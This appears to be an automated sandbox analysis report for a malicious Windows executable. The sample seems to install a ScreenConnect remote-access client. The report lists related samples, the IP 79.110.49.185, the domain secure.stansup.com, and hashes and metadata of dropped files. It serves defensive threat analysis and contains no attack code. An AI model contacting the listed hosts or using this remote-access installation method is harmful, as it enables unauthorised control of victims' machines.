                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                Number of analysed new started processes analysed:17
                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                Sample name:96r3GgxntQ.exe
                                                                                                                                                                                                                renamed because original name is a hash value
                                                                                                                                                                                                                Original Sample Name:a266e99dde8b25878921f9e8447b99b877d08a13476d0b3e2d840b5d296feb0f.exe
                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                Classification:mal66.evad.winEXE@18/77@2/2
                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                • Successful, ratio: 83.3%
                                                                                                                                                                                                                HCA Information:Failed
                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 40.126.31.69, 20.190.159.75, 40.126.31.67, 20.190.159.2, 20.190.159.68, 40.126.31.73, 40.126.31.71, 20.190.159.73, 199.232.214.172, 192.229.221.95, 184.28.90.27, 20.42.65.92
                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, cacerts.digicert.com, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                                                • Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 5292 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                • VT rate limit hit for: 96r3GgxntQ.exe
| Time | Type | Description |
| 13:27:17 | API Interceptor | 373361x Sleep call for process: dfsvc.exe modified |
| 13:27:17 | API Interceptor | 1x Sleep call for process: 96r3GgxntQ.exe modified |
| 13:27:19 | API Interceptor | 2x Sleep call for process: svchost.exe modified |
| 13:27:36 | API Interceptor | 1x Sleep call for process: WerFault.exe modified |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
| 79.110.49.185 | X5zNv1VJia.exe | Get hash | malicious | ScreenConnect Tool | Browse | |
| | AmedVA2n92.exe | Get hash | malicious | ScreenConnect Tool | Browse | |
| | z7NLXIia8r.exe | Get hash | malicious | ScreenConnect Tool | Browse | |
| | wbxZk3AvuB.exe | Get hash | malicious | ScreenConnect Tool | Browse | |
| | 3ckUhKW8W6.exe | Get hash | malicious | ScreenConnect Tool | Browse | |
| | z7NLXIia8r.exe | Get hash | malicious | ScreenConnect Tool | Browse | |
| | wbxZk3AvuB.exe | Get hash | malicious | ScreenConnect Tool | Browse | |
| | 3ckUhKW8W6.exe | Get hash | malicious | ScreenConnect Tool | Browse | |
| | Iw6bIFfJSu.exe | Get hash | malicious | ScreenConnect Tool | Browse | |
| | GdVSN8ISU4.exe | Get hash | malicious | ScreenConnect Tool | Browse | |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
| secure.stansup.com | X5zNv1VJia.exe | Get hash | malicious | ScreenConnect Tool | Browse | 79.110.49.185 |
| | AmedVA2n92.exe | Get hash | malicious | ScreenConnect Tool | Browse | 79.110.49.185 |
| | z7NLXIia8r.exe | Get hash | malicious | ScreenConnect Tool | Browse | 79.110.49.185 |
| | wbxZk3AvuB.exe | Get hash | malicious | ScreenConnect Tool | Browse | 79.110.49.185 |
| | 3ckUhKW8W6.exe | Get hash | malicious | ScreenConnect Tool | Browse | 79.110.49.185 |
| | z7NLXIia8r.exe | Get hash | malicious | ScreenConnect Tool | Browse | 79.110.49.185 |
| | wbxZk3AvuB.exe | Get hash | malicious | ScreenConnect Tool | Browse | 79.110.49.185 |
| | 3ckUhKW8W6.exe | Get hash | malicious | ScreenConnect Tool | Browse | 79.110.49.185 |
| | Iw6bIFfJSu.exe | Get hash | malicious | ScreenConnect Tool | Browse | 79.110.49.185 |
| | GdVSN8ISU4.exe | Get hash | malicious | ScreenConnect Tool | Browse | 79.110.49.185 |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
| OTAVANET-ASCZ | X5zNv1VJia.exe | Get hash | malicious | ScreenConnect Tool | Browse | 79.110.49.185 |
| | AmedVA2n92.exe | Get hash | malicious | ScreenConnect Tool | Browse | 79.110.49.185 |
| | gunzipped.exe | Get hash | malicious | Nanocore | Browse | 79.110.49.176 |
| | z7NLXIia8r.exe | Get hash | malicious | ScreenConnect Tool | Browse | 79.110.49.185 |
| | wbxZk3AvuB.exe | Get hash | malicious | ScreenConnect Tool | Browse | 79.110.49.185 |
| | 3ckUhKW8W6.exe | Get hash | malicious | ScreenConnect Tool | Browse | 79.110.49.185 |
| | z7NLXIia8r.exe | Get hash | malicious | ScreenConnect Tool | Browse | 79.110.49.185 |
| | wbxZk3AvuB.exe | Get hash | malicious | ScreenConnect Tool | Browse | 79.110.49.185 |
| | 3ckUhKW8W6.exe | Get hash | malicious | ScreenConnect Tool | Browse | 79.110.49.185 |
| | Iw6bIFfJSu.exe | Get hash | malicious | ScreenConnect Tool | Browse | 79.110.49.185 |
Match:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe
Associated samples (Detection: malicious, Threat Name: ScreenConnect Tool):
• xrWUzly94Z.exe
• EPCo9k8NIn.exe
• X5zNv1VJia.exe
• AmedVA2n92.exe
• z7NLXIia8r.exe
• wbxZk3AvuB.exe
• 3ckUhKW8W6.exe
• z7NLXIia8r.exe
• wbxZk3AvuB.exe
• 3ckUhKW8W6.exe
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                                                                        Entropy (8bit):0.8008396854887236
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:CJD1YBdWK7S50AhnZ0Ag0ALzJVEbJBJlPVPEH3cNkPfF7Njg9QaQfOgFrGXuE5TX:CJC5rk0X+MbJ72D4qgfiaDhvO7VMBf0
                                                                                                                                                                                                                                                        MD5:CC71B87189D068C9EAB29AD45475D44C
                                                                                                                                                                                                                                                        SHA1:4B7B581DB4DF01E2CB15424F258FD1D6591AAFDF
                                                                                                                                                                                                                                                        SHA-256:9C34D59F5DB6D2DAC7535CF438E2C8A330CE555EEB0E86D46AF613330B4120B8
                                                                                                                                                                                                                                                        SHA-512:CA40D7F99EA066FCBB217BE7EB83C5DA59515F1ADFC637F3CC1A693DE1E03B952D99AECD22FA266D055E26C0BEA188C36BEC1DE353CB6BFA3CF6DA0DD732651E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xc7e8a32c, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                                                                        Entropy (8bit):0.7715870363348013
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:bSB2ESB2SSjlK/7vqlC06Z546I50AEzJ+Ykr3g16XWq2UPkLk+kFLKho38o38+W6:baza9vqcHbrq2UyUVWlW
                                                                                                                                                                                                                                                        MD5:B1054DBC77838D9091785C977DFE8B25
                                                                                                                                                                                                                                                        SHA1:03D84075103B1E56EFB94E080DD314B5610FDC37
                                                                                                                                                                                                                                                        SHA-256:874C5E128A3EAC241E6B8C2E2D544BE7DEB11FBB2F8D4B542C7CBD261F3AA944
                                                                                                                                                                                                                                                        SHA-512:F96E4F7FCC6E4114B84C2202291D7AA65509234DAC364067FA47ECE9652D84A9A5AF35824B05C84BE97D249FA76F8F1861137F79143B7EA90C78C46181A62436
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                                                                                        Entropy (8bit):0.07973054067650195
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:QtyYeGSavr8qrrvr+gvrr/OZ0allVmctlll/Sm1l1:QtyzDgn/OKuLPPv
                                                                                                                                                                                                                                                        MD5:4742488B79192EAC6E632519A6DC137F
                                                                                                                                                                                                                                                        SHA1:32EF179413E67FBC7D882105783E715525B6D84F
                                                                                                                                                                                                                                                        SHA-256:C56262113589D52A9DB4E19E56DBF8E53ED6B1B57E7F8EBE5419F1078C6B6B69
                                                                                                                                                                                                                                                        SHA-512:F6689F80DE299062354FC287C63679586E4F9EA2388F68578FFD8DF0A594A66E87D7CEF8BC56320A2007A2CF1A5252BEA9954087BCB71BBE9EAF5D5624D7E603
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                                        Entropy (8bit):0.9117990972030452
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:adF5vM5U8d5AsohqnGXyf8QXIDcQvc6QcEVcw3cE/P+HbHg/Jg+OgBCXEYcI+1sg:ervMz5A0X0BU/Iji0ozuiFMZ24IO8Q
                                                                                                                                                                                                                                                        MD5:84C7FF937E45F620CBE2F4AB10418B96
                                                                                                                                                                                                                                                        SHA1:53B32660802F5CE23202582DEEBF4537E0872A04
                                                                                                                                                                                                                                                        SHA-256:B547C8548A822F543BBC7EF24105ECEAFDFAD79ED92E40A381588052FBFD5D93
                                                                                                                                                                                                                                                        SHA-512:1F25A9A3DB7AB65A989ADB9F7D40562B2B47CFDA36EA38FA5347BAD6BEA19C043AD06F99F250233D8AF266F04153B7291F6D89D15A25F8A6AFB5AB182C67A3F9
                                                                                                                                                                                                                                                        Malicious:true
Preview:Version=1; EventType=APPCRASH; EventTime=133743508397483456; ReportType=2; Consent=1; UploadTime=133743508403577238; ReportStatus=524384; ReportIdentifier=683ddce7-d285-483b-8fbd-7e2ea1f6255e; IntegratorReportIdentifier=d0484514-0922-41ac-9773-a4f442a7bd84; Wow64Host=34404; Wow64Guest=332; NsAppName=96r3GgxntQ.exe; AppSessionGuid=00001db8-0001-0013-c9a3-9e230327db01; TargetAppId=W:000645b54ec747fd74d134c6d1997c802b2f0000ffff!0000aaf33cf2f9e970a41535a556dc507e667288ac82!96r3GgxntQ.exe; TargetApp
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 14 streams, Fri Oct 25 17:27:20 2024, 0x1205a4 type
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):80864
                                                                                                                                                                                                                                                        Entropy (8bit):1.6904526352803595
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:8kAWjJhI/Th8wJdWS/OSYTXdX8538U/rNb77PV1wIJXQY2F80:8yJhI/GEOlqZb7rJXQY
                                                                                                                                                                                                                                                        MD5:29E2FFA02BFA48B78523C0E65003DC78
                                                                                                                                                                                                                                                        SHA1:497F782B57D6A33E9A94AA65ACF1B557A4D31330
                                                                                                                                                                                                                                                        SHA-256:0E47893B853B8B8248A3E30A3D975C4F5CAE06DF0C1A9DFB42A4F94A2378DB6C
                                                                                                                                                                                                                                                        SHA-512:3BE3E334AD98DC7F4120A1C3A6D56490410DFAC204FBF7BBAAC4D01DF5E2186B023F2D0997930544A58017CAF16A21B3897875F64DAF6E2BD6DAC430DB2F46AE
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):8330
                                                                                                                                                                                                                                                        Entropy (8bit):3.7021577000772097
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:R6l7wVeJNa6p3T6YeVSU94Lgmf0tfprzx89bHpcsf4UNJm:R6lXJQ6p3T6YMSU94Lgmf0twHpvf4Sk
                                                                                                                                                                                                                                                        MD5:55C578AE764B1776890AB89C4336461C
                                                                                                                                                                                                                                                        SHA1:5933B7DD609809E8001967478D40564E9A4614B7
                                                                                                                                                                                                                                                        SHA-256:9E2295AD89B795378A5B2967AD68E88B18E5213B6E4D462042DF7E200AA58B71
                                                                                                                                                                                                                                                        SHA-512:4BBB8FA10CEF6AAB9356077D3213500377DBE70785F8E6E9F1049555A13B4E791332E423E516FE2F68CD92E089D049F4CEDCCF670993409B0D9547C4F3B62B18
                                                                                                                                                                                                                                                        Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>7608</Pi
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):4593
                                                                                                                                                                                                                                                        Entropy (8bit):4.472645300650811
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsiNJg77aI9svWpW8VYtYm8M4JdLFg+q8N5aM7V3d:uIjfinI7i+7VhJ8qz7V3d
                                                                                                                                                                                                                                                        MD5:B860CE4C5764F9E8C092FCE4D0458F11
                                                                                                                                                                                                                                                        SHA1:53BCB2B77CF3352E9D5DCDA2A20A75AA1C4982AD
                                                                                                                                                                                                                                                        SHA-256:6F9F1B91DEF8CAED54190CFE0320FFFDC3504C036857D4ED2952E8FCA1610D24
                                                                                                                                                                                                                                                        SHA-512:81E5D1500BE67B8FB08C2E42638C8BF29CA06A89C67A14D3C76DB81BAE3299BD05790379C8E2C0E6B50D0E57612194E3BCDB109EBF5109C2DC1937EDD8A7B1A1
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="559230" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):84112
                                                                                                                                                                                                                                                        Entropy (8bit):3.0966545243187964
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:4f8pJsASvPMzJmjf6vkhb2HO2GM8xWMjE6H9QnD0G:4f8pJsASvPMzJmjf6vkhb2HO2GM8x7jC
                                                                                                                                                                                                                                                        MD5:A4CD2DA063792054CFC4038B176BEF46
                                                                                                                                                                                                                                                        SHA1:82952B89EBEE94F5488849F5D9FAD2B4629DF03F
                                                                                                                                                                                                                                                        SHA-256:98C3082DFC8AF1B717D8966110EAAA6E887A8AC23C34E5D10375B7FD9B661285
                                                                                                                                                                                                                                                        SHA-512:21D99E0493E64B18DFE9146D575533220E1655ADE6FF091F5F44156AD7DB1607F4A84EA4FAFC3AEBC014D620369231FBEFBC4E196D92AE2507B3F259DB84A3A7
                                                                                                                                                                                                                                                        Malicious:false
Preview:ImageName,UniqueProcessId,NumberOfThreads,WorkingSetPrivateSize,HardFaultCount,NumberOfThreadsHighWatermark,CycleTime,CreateTime,UserTime,KernelTime,BasePriority,PeakVirtualSize,VirtualSize,PageFaultCount,WorkingSetSize,PeakWorkingSetSize,QuotaPeakPagedPoolUsage,QuotaPagedPoolUsage,QuotaPeakNonPagedPoolUsage,QuotaNonPagedPoolUsage,PagefileUsage,PeakPagefileUsage,PrivatePageCount,ReadOperationCount,WriteOperationCount,OtherOperationCount,ReadTransferCount,WriteTransferCount,OtherTransferCount,Han
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                                                                        Entropy (8bit):2.6856159031438334
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:TiZYWU1valfYQYVW4HhYEZGNPtMi1uYSTwG3Kea37Zu4MySoSIQd+3:2ZDUyXPc6eaLZu4MySo1Qs3
                                                                                                                                                                                                                                                        MD5:ED9C914934D255E29F14904C011E095B
                                                                                                                                                                                                                                                        SHA1:C3B65E9AB0CE06D1D0D9153D74B77C3950514275
                                                                                                                                                                                                                                                        SHA-256:6A5DCCC2000D86C5E399186E88F83F6F12F986CE0353031BA7C4A2158CEEA508
                                                                                                                                                                                                                                                        SHA-512:3D5B6421AB88DEF776E9B21B0E69224BD43361AE81986FB7EF6B37CFEA1C4F0D95D48BCC1241820ADACD1F7CADFDF1D2519317483D9384E6A08B38D5CE2D59E2
                                                                                                                                                                                                                                                        Malicious:false
Preview:TimerResolution 156250 | PageSize 4096 | NumberOfPhysicalPages 1048333 | LowestPhysicalPageNumber 2 | HighestPhysicalPageNumber 1310719 | AllocationGranularity 65536 | MinimumUserModeAddress 65536 | MaximumUserModeAddress 140737488289791 | ActiveProcessorsAffinityMask
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):4770
                                                                                                                                                                                                                                                        Entropy (8bit):7.946747821604857
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
                                                                                                                                                                                                                                                        MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
                                                                                                                                                                                                                                                        SHA1:719C37C320F518AC168C86723724891950911CEA
                                                                                                                                                                                                                                                        SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
                                                                                                                                                                                                                                                        SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):71954
                                                                                                                                                                                                                                                        Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:Certificate, Version=3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1716
                                                                                                                                                                                                                                                        Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                                        MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                                        SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                                        SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                                        SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):727
                                                                                                                                                                                                                                                        Entropy (8bit):7.563840806637443
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:5onfZPc5RlRtBfQRKsS3GO1OfBJWPggSMcJD0Khky41hrQOSFxvF0nBwUU2wZ:5iFcdZ6KP3YHHMcJyyO9QOSunaT2wZ
                                                                                                                                                                                                                                                        MD5:23D2A40D03B92FF977A4F7F3F5B7B3D6
                                                                                                                                                                                                                                                        SHA1:DFAF45BE65A508FED92543473C235FB9E56EC900
                                                                                                                                                                                                                                                        SHA-256:42931FA0CF548D85BAB78A132B91B75AF2E8C94891568C976BE1C9B48D3ECAB1
                                                                                                                                                                                                                                                        SHA-512:2383D3513513D6D929FD1B7D780D152B3D8240EC013DEF216C6BAB6127B3C4BC523770A1BD388A84100C0672E68B6C46E62DDAAD78BB641E084C6F43690C1966
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:Certificate, Version=3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1428
                                                                                                                                                                                                                                                        Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                                        MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                                        SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                                        SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                                        SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                        Size (bytes):338
                                                                                                                                                                                                                                                        Entropy (8bit):3.5502094615357818
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:kKzlK8KC+3JmsN+SkQlPlEGYRMY9z+s3Ql2DUevat:rQe+kTkPlE99SCQl2DUevat
                                                                                                                                                                                                                                                        MD5:5DE7D9D265C42D055E0B87D627BE00FF
                                                                                                                                                                                                                                                        SHA1:7A81B522DBE597F92968A337F3474C40DA5B6022
                                                                                                                                                                                                                                                        SHA-256:B35BDB9AD4C564F4C9ADC62BBCFCE6AA0564F3F3F96F8D837F6D1A2368BB05AD
                                                                                                                                                                                                                                                        SHA-512:D06593ED9D6B4220B2E8D4D4B067E7E9841678C36D6B07FFB47863F6DCED3C3E237F393376882C6AE25BB58BBA6FAF49F0D07BF602C84B593AC00C2496EBA579
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:p...... ........r..(..(.................................................B.'.. .........p.........$.....(=........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                        Entropy (8bit):3.253995428229511
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:kKrtL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:BiDImsLNkPlE99SNxAhUe/3
                                                                                                                                                                                                                                                        MD5:AE7E342D500CBD236BDA3FA905CA67BA
                                                                                                                                                                                                                                                        SHA1:926D905418105DDFFF418CAE068BFA7183E109ED
                                                                                                                                                                                                                                                        SHA-256:AB7A7B6F6EA2071250993B32592ED99A5BF7BFF873E3078BFE8AEAF3F44D11A1
                                                                                                                                                                                                                                                        SHA-512:7E03946675825C98441250BA804868E06E6539445374EC28692739FF6FDDE7F9B438423B38AA404238B11226A69C380BB4F96918FF4C4C6192F6C4E61AAB45C0
                                                                                                                                                                                                                                                        Malicious:false
